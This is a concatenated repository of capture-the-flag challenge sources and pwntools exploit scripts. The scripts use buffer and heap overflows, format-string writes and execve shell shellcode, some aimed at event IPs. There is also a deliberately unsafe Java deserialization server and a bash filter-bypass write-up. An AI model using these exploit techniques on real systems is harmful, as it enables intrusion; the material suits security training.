Decompiled with CFR 0_124. 
3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Lamp 9 | extends Artifact { 10 | private static final long serialVersionUID = 3224471417469864672L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/TeaSet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class TeaSet 9 | extends Artifact { 10 | private static final long serialVersionUID = 3746032360504837381L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Wand.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Wand 9 | extends Artifact { 10 | private static final long serialVersionUID = 2245343830983149775L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Frog.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Frog 9 | extends Artifact { 10 | private static final long serialVersionUID = 1541961207696730155L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Lamp.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 
3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Lamp 9 | extends Artifact { 10 | private static final long serialVersionUID = 3224471417469864672L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/TeaSet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class TeaSet 9 | extends Artifact { 10 | private static final long serialVersionUID = 3746032360504837381L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Wand.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Wand 9 | extends Artifact { 10 | private static final long serialVersionUID = 2245343830983149775L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Cauldron.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Cauldron 9 | extends Artifact { 10 | private static final long serialVersionUID = -2089840597819821199L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Mirror.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 
3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Mirror 9 | extends Artifact { 10 | private static final long serialVersionUID = -5693218123114522907L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Cauldron.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Cauldron 9 | extends Artifact { 10 | private static final long serialVersionUID = -2089840597819821199L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Mirror.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Mirror 9 | extends Artifact { 10 | private static final long serialVersionUID = -5693218123114522907L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Broomstick.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Broomstick 9 | extends Artifact { 10 | private static final long serialVersionUID = -7101213341880981833L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Broomstick.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 
3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Broomstick 9 | extends Artifact { 10 | private static final long serialVersionUID = -7101213341880981833L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /meepwn-2018/baby-sandbox/code.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void func() { 5 | register int esp asm("esp"); 6 | if ((esp >= (0x1000000 + 0x200000)) && 7 | (esp <= (0x1000000 + 0x200100)) ) { 8 | asm("mov $1, %eax"); 9 | asm("int $0x80"); 10 | } 11 | } 12 | 13 | int main() { 14 | func(); 15 | return 0; 16 | } 17 | -------------------------------------------------------------------------------- /tuctf-2018/canary/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.terminal = ['tmux', 'splitw', '-h'] 4 | context.log_level = 'debug' 5 | 6 | #p = process("./canary") 7 | #gdb.attach(p) 8 | p = remote("18.222.227.1", 12345) 9 | 10 | payload = "a"*0x28 + p32(1) + p32((0x100000000 + (0x0804A06C - 0x0804A0A0))/4) + \ 11 | p32(0x80486C1)*10 12 | p.sendline(payload) 13 | 14 | p.interactive() 15 | -------------------------------------------------------------------------------- /insomni-hack-18/sapeloshop/footer.html: -------------------------------------------------------------------------------- 1 | 2 |
3 | 4 | 5 | 6 |
7 |
8 |

©Jackie Stewart. Gabao RPZ à point 0.

9 |
10 |
11 | 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-17/babyfirst/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | p = process("./babyfirst") 4 | 5 | p.recvuntil("Your name please?") 6 | p.sendline("Dhaval"); 7 | 8 | p.recvuntil("Your last wish before dying?") 9 | 10 | flag_addr = 0x602080 11 | payload = p64(flag_addr)*300 12 | 13 | p.sendline(payload); 14 | 15 | p.recvuntil("stack smashing detected ***: ") 16 | 17 | log.info(p.recvuntil(" ").strip()) 18 | 19 | p.close() 20 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/.project: -------------------------------------------------------------------------------- 1 | 2 | 3 | magichat-client 4 | 5 | 6 | 7 | 8 | 9 | org.eclipse.jdt.core.javabuilder 10 | 11 | 12 | 13 | 14 | 15 | org.eclipse.jdt.core.javanature 16 | 17 | 18 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/.project: -------------------------------------------------------------------------------- 1 | 2 | 3 | magichat-server 4 | 5 | 6 | 7 | 8 | 9 | org.eclipse.jdt.core.javabuilder 10 | 11 | 12 | 13 | 14 | 15 | org.eclipse.jdt.core.javanature 16 | 17 | 18 | -------------------------------------------------------------------------------- /tuctf-2018/lisa/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.terminal = ['tmux', 'splitw', '-h'] 4 | context.log_level = 'debug' 5 | 6 | #p = process("./lisa") 7 | #gdb.attach(p) 8 | p = remote("18.191.244.121", 12345) 9 | 10 | p.recvuntil("share: ") 11 | heap_leak = int(p.recvline()[2:], 16) 12 | log.info(hex(heap_leak)) 13 | p.recvuntil("you alright...") 14 | 15 | payload = p32(0) + p32(heap_leak) + p32(0x20) 16 | p.send(payload) 17 | 18 | p.recvuntil("mouth?") 19 | payload = 
"a"*0x1c + "\x15" # read 20 | p.send(payload) 21 | p.send("\x00") 22 | p.interactive() 23 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/.classpath: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /codegate-2018/zoo/structs.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | struct feed { 4 | char *str; 5 | uint64_t padding; 6 | char medicine_name[8]; 7 | char medicine_desc[120]; 8 | }; 9 | 10 | struct animal { 11 | uint32_t initalized; 12 | char name[20]; 13 | struct feed *feeds[20]; 14 | char *species; 15 | char *dungs[25]; 16 | uint32_t likes; 17 | uint32_t feed_index2; 18 | uint32_t feed_index; 19 | uint32_t dung_index2; 20 | uint32_t dung_index; 21 | uint32_t is_ill; 22 | uint32_t feed_flag_ill; 23 | }; 24 | 25 | struct zoo { 26 | char name[16]; 27 | struct animal animals[5]; 28 | }; 29 | -------------------------------------------------------------------------------- /csaw-ctf-2013/exploitation-2/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | shellcode = asm(pwnlib.shellcraft.i386.linux.readfile("./key", 4)) 4 | 5 | # p = process("./exploit2") 6 | # gdb.attach(p) 7 | 8 | conn = remote("localhost", 31338) 9 | 10 | buffer_addr = u32(conn.recvn(4)) 11 | canary = u32(conn.recvn(4)) 12 | 13 | log.info("BUF_ADDR: " + str(hex(buffer_addr))) 14 | 15 | payload = shellcode.ljust(2048, "a") 16 | payload += p32(canary) 17 | payload += "a"*4 # ebx 18 | payload += "a"*4 # edi 19 | payload += "a"*4 # ebp 20 | payload += p32(buffer_addr) 21 | 22 | conn.sendline(payload) 23 | 24 | conn.interactive() 25 | -------------------------------------------------------------------------------- 
/insomni-hack-18/magichat/client/src/ch/scrt/WizardAPI.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt; 5 | 6 | import ch.scrt.model.Hat; 7 | import java.rmi.Remote; 8 | import java.rmi.RemoteException; 9 | import org.apache.commons.lang3.tuple.Pair; 10 | 11 | public interface WizardAPI 12 | extends Remote { 13 | public static final int PORT = 51966; 14 | public static final String IP = "magichat.teaser.insomnihack.ch"; 15 | 16 | public String message(int var1) throws RemoteException; 17 | 18 | public Hat getMagicHat() throws RemoteException; 19 | 20 | public Pair castASpell(Hat var1) throws RemoteException; 21 | } 22 | 23 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/WizardAPI.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 
3 | */ 4 | package ch.scrt; 5 | 6 | import ch.scrt.model.Hat; 7 | import java.rmi.Remote; 8 | import java.rmi.RemoteException; 9 | import org.apache.commons.lang3.tuple.Pair; 10 | 11 | public interface WizardAPI 12 | extends Remote { 13 | public static final int PORT = 51966; 14 | public static final String IP = "magichat.teaser.insomnihack.ch"; 15 | 16 | public String message(int var1) throws RemoteException; 17 | 18 | public Hat getMagicHat() throws RemoteException; 19 | 20 | public Pair castASpell(Hat var1) throws RemoteException; 21 | } 22 | 23 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/Server.java: -------------------------------------------------------------------------------- 1 | package ch.scrt; 2 | 3 | import java.rmi.Naming; 4 | import java.rmi.registry.LocateRegistry; 5 | 6 | public class Server { 7 | public static void main(String[] args) { 8 | try { 9 | System.setProperty("org.apache.commons.collections.enableUnsafeSerialization", "true"); 10 | System.out.println("Server ready"); 11 | WizardAPIImpl w = new WizardAPIImpl(); 12 | System.out.println("Server ready2"); 13 | LocateRegistry.createRegistry(2020); 14 | Naming.bind("rmi://localhost:2020/Wizard", w); 15 | System.out.println("Server ready3"); 16 | } catch (Exception e) { 17 | System.out.println("Exception: " + e.toString()); 18 | } 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/.classpath: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Scroll.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 
3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Scroll 9 | extends Artifact { 10 | private static final long serialVersionUID = -8302681252939001444L; 11 | private String content = " ____________________________\n()==( (@==()\n '___________________________'|\n | |\n | *unintelligible runes* |\n __)__________________________|\n()==( (@==()\n '---------------------------'"; 12 | 13 | @Override 14 | public String toString() { 15 | return super.toString() + "\n[" + this.content + "]"; 16 | } 17 | } 18 | 19 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Scroll.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Scroll 9 | extends Artifact { 10 | private static final long serialVersionUID = -8302681252939001444L; 11 | private String content = " ____________________________\n()==( (@==()\n '___________________________'|\n | |\n | *unintelligible runes* |\n __)__________________________|\n()==( (@==()\n '---------------------------'"; 12 | 13 | @Override 14 | public String toString() { 15 | return super.toString() + "\n[" + this.content + "]"; 16 | } 17 | } 18 | 19 | -------------------------------------------------------------------------------- /csaw-ctf-2013/exploitation-3/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Need to run multiple times 4 | 5 | bin = ELF("fil_chal") 6 | p = process("./fil_chal") 7 | 8 | shellcode = asm(pwnlib.shellcraft.i386.linux.readfile("./key", 4)) 9 | random_stack_addr = 0xff88a534 10 | 11 | conn = remote("localhost", 34266) 12 | 13 | conn.sendline("csaw2013") 14 | conn.sendline("S1mplePWD") 15 | 16 | conn.recvuntil("Entry") 17 | conn.sendline("-1") 18 | 19 | payload 
= "a"*0x41c 20 | payload += "a"*4 21 | log.info(hex(bin.symbols['recv'])) 22 | # Overwriting return address 23 | payload += p32(bin.symbols['recv']) 24 | payload += p32(random_stack_addr) 25 | payload += p32(4) 26 | payload += p32(random_stack_addr) 27 | payload += p32(100) 28 | payload += p32(0) 29 | 30 | conn.sendline(payload) 31 | 32 | conn.sendline(shellcode) 33 | 34 | conn.interactive() -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Hat.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | import org.apache.commons.collections.Bag; 8 | import org.apache.commons.collections.bag.HashBag; 9 | 10 | public class Hat 11 | extends Artifact { 12 | private static final long serialVersionUID = 2028004707566014564L; 13 | private Bag content = new HashBag(); 14 | 15 | public void add(Artifact a) { 16 | this.content.add(a); 17 | } 18 | 19 | @Override 20 | public String toString() { 21 | String str = super.toString(); 22 | if (!this.content.isEmpty()) { 23 | str = str + " that contains: \n" + this.content.toString().replace(":", "x ").replace(',', '\n'); 24 | } 25 | return str; 26 | } 27 | } 28 | 29 | -------------------------------------------------------------------------------- /securinets-2018/no-mercy/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | bin = ELF("./no_mercy") 7 | 8 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so.6")} 9 | 10 | p = remote("52.50.127.68", 44444) 11 | 12 | #p = process("./no_mercy", env=env) 13 | #gdb.attach(p) 14 | 15 | leak_addr = 0x08048573 16 | payload = "a"*6 + \ 17 | "LIBC_FATAL_STDERR_=1".ljust(0x20, "1")*3 18 | payload = 
payload.ljust(234, "a") 19 | payload += p32(leak_addr) + \ 20 | "a"*4 + \ 21 | p32(0xffffd830) 22 | payload += "LIBC_FATAL_STDERR_=1".ljust(0x20, "1")*50 23 | p.sendline(payload) 24 | p.sendline("b") 25 | 26 | p.recvuntil("stack smashing detected ***: ") 27 | a = p.recvuntil(" terminated") 28 | 29 | print(a.encode('hex')) 30 | 31 | p.interactive() 32 | -------------------------------------------------------------------------------- /securinets-2018/protect/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | bin = ELF("./protect") 7 | 8 | #conn = process("./protect") 9 | #gdb.attach(conn) 10 | conn = remote("34.242.96.216", 11111) 11 | 12 | pop7_gadget = 0x080485c5 13 | pop3_gadget = 0x080485c9 14 | ret_gadget = 0x0804833a 15 | 16 | shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" 17 | 18 | payload = p32(pop7_gadget) + \ 19 | p32(ret_gadget)*10 + \ 20 | p32(bin.symbols['read']) + \ 21 | p32(0x30303030) + \ 22 | p32(0) + \ 23 | p32(0x30303030) + \ 24 | p32(len(shellcode)) 25 | 26 | conn.send(payload.ljust(0x400, "\x00")) 27 | 28 | conn.send(shellcode) 29 | 30 | conn.interactive() 31 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Hat.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 
3 | */ 4 | package ch.scrt.model; 5 | 6 | import org.apache.commons.collections.Bag; 7 | import org.apache.commons.collections.bag.HashBag; 8 | 9 | import ch.scrt.model.Artifact; 10 | 11 | public class Hat 12 | extends Artifact { 13 | private static final long serialVersionUID = 2028004707566014564L; 14 | private Bag content = new HashBag(); 15 | 16 | public void add(Artifact a) { 17 | this.content.add(a); 18 | } 19 | 20 | @Override 21 | public String toString() { 22 | String str = super.toString(); 23 | if (!this.content.isEmpty()) { 24 | str = str + " that contains: \n" + this.content.toString().replace(":", "x ").replace(',', '\n'); 25 | } 26 | return str; 27 | } 28 | } 29 | 30 | -------------------------------------------------------------------------------- /securinets-2018/special/writeup: -------------------------------------------------------------------------------- 1 | It looks like a lot of characters are filtered out. 2 | 3 | Running this reveals chars which are left: 4 | ;1234567890-=qwertyuiop[]\asdfghjkl;'zxcvbnm,./`~!@#$%^&*()_+QWERTYUIOP{}|ASDFGHJKL:"ZXCVBNM<>? 
5 | bash: -c: line 0: syntax error near unexpected token `;' 6 | bash: -c: line 0: `;-;#$^_+QWERTYUIOP{}|ASDFGHJKL:ZXCVBNM<>' 7 | 8 | Let's check the environment variable `_`: 9 | > `${_}` 10 | declare -x A="T" 11 | declare -x AB="HI" 12 | declare -x ABC="ISN" 13 | declare -x ABCD="OTTH" 14 | declare -x ABCDE="EFLAG" 15 | declare -x ABCDEF="BUTMAY" 16 | declare -x ABCDEFG="BEITCAN" 17 | declare -x ABCDEFGH="HELPGETT" 18 | declare -x ABCDEFGHI="INGFLAG:D" 19 | declare -x OLDPWD 20 | declare -x PWD="/home/special" 21 | declare -x SHELL="" 22 | declare -x SHLVL="1" 23 | declare -x _="export" 24 | 25 | Finally: ${PWD:${#ABCDEF}:${#A}}${PWD:${#A}:${#A}} 26 | ^ expands to 'sh': with PWD="/home/special", ${#ABCDEF} is 6 and ${#A} is 1, so the first substring is the 's' at offset 6 and the second is the 'h' at offset 1 (bash substring expansion only needs the characters that survive the filter). 27 | 28 | Flag{B4sh_subst1tut1on_is_gud!} 29 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/WizardAPIImpl.java: -------------------------------------------------------------------------------- 1 | package ch.scrt; 2 | 3 | import java.rmi.RemoteException; 4 | import java.rmi.server.UnicastRemoteObject; 5 | 6 | import org.apache.commons.lang3.tuple.MutablePair; 7 | import org.apache.commons.lang3.tuple.Pair; 8 | 9 | import ch.scrt.model.Hat; 10 | 11 | public class WizardAPIImpl extends UnicastRemoteObject implements WizardAPI { 12 | 13 | /** 14 | * 15 | */ 16 | private static final long serialVersionUID = 1689583531382468090L; 17 | 18 | protected WizardAPIImpl() throws RemoteException { 19 | super(); 20 | } 21 | 22 | @Override 23 | public String message(int var1) throws RemoteException { 24 | return "SERVER_MESSAGE"; 25 | } 26 | 27 | @Override 28 | public Hat getMagicHat() throws RemoteException { 29 | return new Hat(); 30 | } 31 | 32 | @Override 33 | public Pair castASpell(Hat var1) throws RemoteException { 34 | return null; 35 | } 36 | 37 | } 38 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Artifact.java: 
-------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import java.io.Serializable; 7 | 8 | public abstract class Artifact 9 | implements Serializable { 10 | private static final long serialVersionUID = 5612698299188628963L; 11 | private Essence essence = Essence.ORDINARY; 12 | 13 | Artifact() { 14 | } 15 | 16 | public String toString() { 17 | return this.essence.name().toLowerCase() + " " + this.getClass().getSimpleName().toLowerCase(); 18 | } 19 | 20 | public boolean equals(Object o) { 21 | return this.toString().equals(o.toString()); 22 | } 23 | 24 | public int hashCode() { 25 | return this.toString().hashCode(); 26 | } 27 | 28 | private static enum Essence { 29 | ORDINARY, 30 | MAGIC; 31 | 32 | 33 | private Essence() { 34 | } 35 | } 36 | 37 | } 38 | 39 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Artifact.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 
3 | */ 4 | package ch.scrt.model; 5 | 6 | import java.io.Serializable; 7 | 8 | public abstract class Artifact 9 | implements Serializable { 10 | private static final long serialVersionUID = 5612698299188628963L; 11 | private Essence essence = Essence.ORDINARY; 12 | 13 | Artifact() { 14 | } 15 | 16 | public String toString() { 17 | return this.essence.name().toLowerCase() + " " + this.getClass().getSimpleName().toLowerCase(); 18 | } 19 | 20 | public boolean equals(Object o) { 21 | return this.toString().equals(o.toString()); 22 | } 23 | 24 | public int hashCode() { 25 | return this.toString().hashCode(); 26 | } 27 | 28 | private static enum Essence { 29 | ORDINARY, 30 | MAGIC; 31 | 32 | 33 | private Essence() { 34 | } 35 | } 36 | 37 | } 38 | 39 | -------------------------------------------------------------------------------- /securinets-2018/format-me/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | bin = ELF("./format") 7 | 8 | p = process("./format") 9 | gdb.attach(p, """ 10 | break *0x0804863e 11 | """) 12 | 13 | """ 14 | 0xff8a21c0: 0xff8a22b4 0xff8a21ec 0xf77575a0 0x08048563 <- 3 15 | 0xff8a21d0: 0x00000007 0xf7798c08 0x6e43a318 0xff8a2444 <- 7 16 | 0xff8a21e0: 0x00000000 0x00000000 0xf77731a0 0x61616161 <- 11 17 | 0xff8a21f0: 0x61616161 0x78383025 0x3830252d 0xff000a78 18 | 0xff8a2200: 0x00000001 0x00000000 0xf7798000 0xf77002a2 19 | """ 20 | 21 | payload = fmtstr_payload(11, 22 | { 23 | bin.got['exit']: 0xfffe514a + 0x1000 24 | }, 25 | 0xf6 - 0xef, 26 | write_size='short' 27 | ) 28 | 29 | log.info(payload.encode('hex')) 30 | p.sendline(payload) 31 | 32 | p.interactive() 33 | -------------------------------------------------------------------------------- /hacklu-2017/multi-o-flow/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 
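file = "./mult-o-flow"

bin = ELF(file)

# Both are static symbols of the (assumed non-PIE) binary: `player` presumably
# ends up holding the "sh" sent below, so it doubles as system()'s argument.
sh_addr = bin.symbols['player']
system_addr = bin.symbols['system']
# Hard-coded rather than leaked: only valid if the target really uses this
# fixed canary value — TODO confirm against the binary.
canary = 0x112233

conn = process(file)

# Overflow into scrape_flag
conn.send("sh" + "\x00"*62)

conn.recvuntil(":-)\n")

isp = "ISP:" + "a"*9 # Should start at temp_buf at first sprintf
isp = isp.ljust(0x200 - len("City:") - 9 + len("ISP:") + 9, "b")

city = "City:" + "c"*9 # Should start at temp_buf at second sprintf
city += "d"*4 + p32(canary)[:3] + "<" # This '<' will become 0 in 1st sprintf

# After 1st sprintf, city string will be at start of temp_buf, with a NULL at
# the 8th byte. sprintf will stop copying city here! But the next '<' will still
# be overwritten with 0.
city += "e"*16 + p32(system_addr)[0:3] + "<"

# Only the low three bytes of each 32-bit value are sent; the NUL that sprintf
# writes after the copied string presumably supplies the fourth (0x00) byte.
payload = "p"*(0x1000 + 0x200 - len("ISP:") - 9)
payload += isp
payload += city
payload += "f"*4
payload += p32(sh_addr)[0:3]

#gdb.attach(conn)
conn.send(payload)

conn.interactive()

-------------------------------------------------------------------------------- /hacklu-2017/exam/exploit.py: --------------------------------------------------------------------------------
from pwn import *

file = './exam'

#context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

#conn = gdb.debug(file)
conn = process(file)


def add_sum(sum):
    """Menu 1: add a sum. `sum` is sent raw, so the caller decides whether a
    newline terminates the input (128 bytes with "\\n" vs. 129 bytes without)."""
    conn.recvuntil("> ")
    conn.sendline("1")
    conn.recvuntil(":-)\n> ")
    conn.send(sum)


def remove_sum(i):
    """Menu 2: remove the sum stored at index `i`."""
    conn.recvuntil("> ")
    conn.sendline("2")
    conn.recvuntil("remove?\n> ")
    conn.sendline(str(i))


def create_crib():
    """Menu 4: create the crib; returns once the program has printed "Result"."""
    conn.recvuntil(">")
    conn.sendline("4")
    conn.recvuntil("Result")


def tear_crib():
    """Menu 5: tear the crib down. Not used by the sequence below."""
    conn.recvuntil(">")
    conn.sendline("5")
    conn.recvuntil("awesome, didn't it? :-)")


#add_sum(p64(144) * (128/8) + "\n")
add_sum("a"*127 + "\n")
add_sum("e"*127 + "\n")
add_sum("b"*127 + "\n")
add_sum("c"*127 + "\n")
add_sum("d"*127 + "\n")

remove_sum(2)

#add_sum("e"*127 + "\n")
# Sixteen copies of 144*3 (0x1b0) plus one trailing byte: 129 bytes, no newline.
# `//` rather than `/`: on Python 3 `128/8` is the float 16.0 and `str * float`
# raises TypeError; integer division gives the same 16 on Python 2.
add_sum(p64(144*3) * (128//8) + "\x90")

remove_sum(0)
remove_sum(3)

add_sum("a"*127 + "\n")
create_crib()
add_sum("ITSMAGIC"*8 + "/bin/sh" + "\n")

# Menu 6 followed by a second choice; no prompt is waited for in between, so the
# two lines are sent back-to-back.
conn.sendline("6")
conn.sendline("2")

conn.interactive()

-------------------------------------------------------------------------------- /securinets-2018/boobs/exploit.py: --------------------------------------------------------------------------------
from pwn import *

context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

bin = ELF("./boobs")

#conn = process("./boobs")
#gdb.attach(conn)
# Hard-coded event infrastructure address; use the process() line above to run
# against a local copy.
conn = remote("34.242.96.216", 22222)


def menu(choice):
    """Send a main-menu choice without consuming the prompt (see commented line)."""
    # conn.recvuntil("classroom")
    conn.sendline(str(choice))


def create(course, title, content):
    """Menu 1 on a new course number: course, then title, then content."""
    menu(1)
    #conn.recvuntil("Enter course number")
    conn.sendline(str(course))
    # conn.recvuntil("Adding new course")
    conn.sendline(title)
    #conn.recvuntil("course content")
    conn.sendline(content)


def edit(course, content):
    """Menu 1 on an existing course number. Same option as create(): the program
    presumably skips the title prompt for a known course and asks for new text
    only — TODO confirm in the binary."""
    menu(1)
    #conn.recvuntil("Enter course number")
    conn.sendline(str(course))
    # conn.recvuntil("course text")
    conn.sendline(content)


def publish():
    """Menu 3: publish (presumably what calls through the overwritten pointers)."""
    menu(3)


#conn.recvuntil("new classroom:")
conn.sendline("vampire")

for i in range(1, 80):
    create(i, "a", "b")

# Courses 80 and 81 get 258 filler bytes followed by a code address, so
# whatever sits 258 bytes past the text (presumably a function pointer) now
# points at check() and get_boobs() respectively.
create(80, "a", "b")
payload = "a"*258 + p32(bin.symbols['check'])
edit(80, payload)
create(81, "a", "b")
payload = "a"*258 + p32(bin.symbols['get_boobs'])
edit(81, payload)

publish()

conn.interactive()
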
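-------------------------------------------------------------------------------- /defcon-2015/babyecho/exploit.py: --------------------------------------------------------------------------------
from pwn import *

p = process("./babyecho")

'''
Stack layout as seen by printf (positional index -> content; parenthesised
offsets are relative to &buf, 4-byte slots):
0 -> &buf (0x0)
1 -> v6 (temp)
2 -> 10
3 -> 0
4 -> v6 (0x10)
5 -> &buf
6 -> < flag, on 0 while loop breaks >
7 -> buf[0-4] (0x1c)
.
.
.
263 -> canary (0x41c)
264 -> ebp
265 -> return address
'''

p.recvuntil("bytes\n")

# The program echoes our format string, so "%5$x" prints slot 5, i.e. &buf.
log.info("Leaking address of buf")
p.sendline("%5$x")
addr_buf = int(p.recvline().strip(), 16)

p.recvuntil("bytes\n")

# Slot 4 (v6 in the sketch, presumably the read length) is 12 bytes below buf.
# The value written is 90; the old log line claimed 1100, which did not match.
log.info("Updating v6 to 90")
writes = { addr_buf - 4*3 : 90 }
payload = fmtstr_payload(7, writes, write_size='int')
log.info("Payload: " + payload)
p.sendline(payload)

p.recvuntil("bytes\n")

# Third message: shellcode at the start of buf, then a format string that
# (a) writes &buf over the saved return address in two 16-bit halves and
# (b) writes 50 into slot 6, the loop flag from the sketch.
# NOTE(review): 0x410 does not line up with the sketch (return address at slot
# 265 would be 0x408 from slot 7), so the leaked value may not be exactly &buf;
# the offset was presumably verified empirically — confirm before reuse.
log.info("Overwriting return address with buf's addr: " + str(hex(addr_buf)))
log.info("Overwriting flag with 50")
writes = {
    addr_buf + 0x410: addr_buf % (256*256),
    # Integer division: on Python 3 '/' yields a float, which fmtstr_payload
    # cannot pack; '//' is identical on Python 2.
    addr_buf + 0x410 + 2: addr_buf // (256*256),
    addr_buf - 4: 50
}
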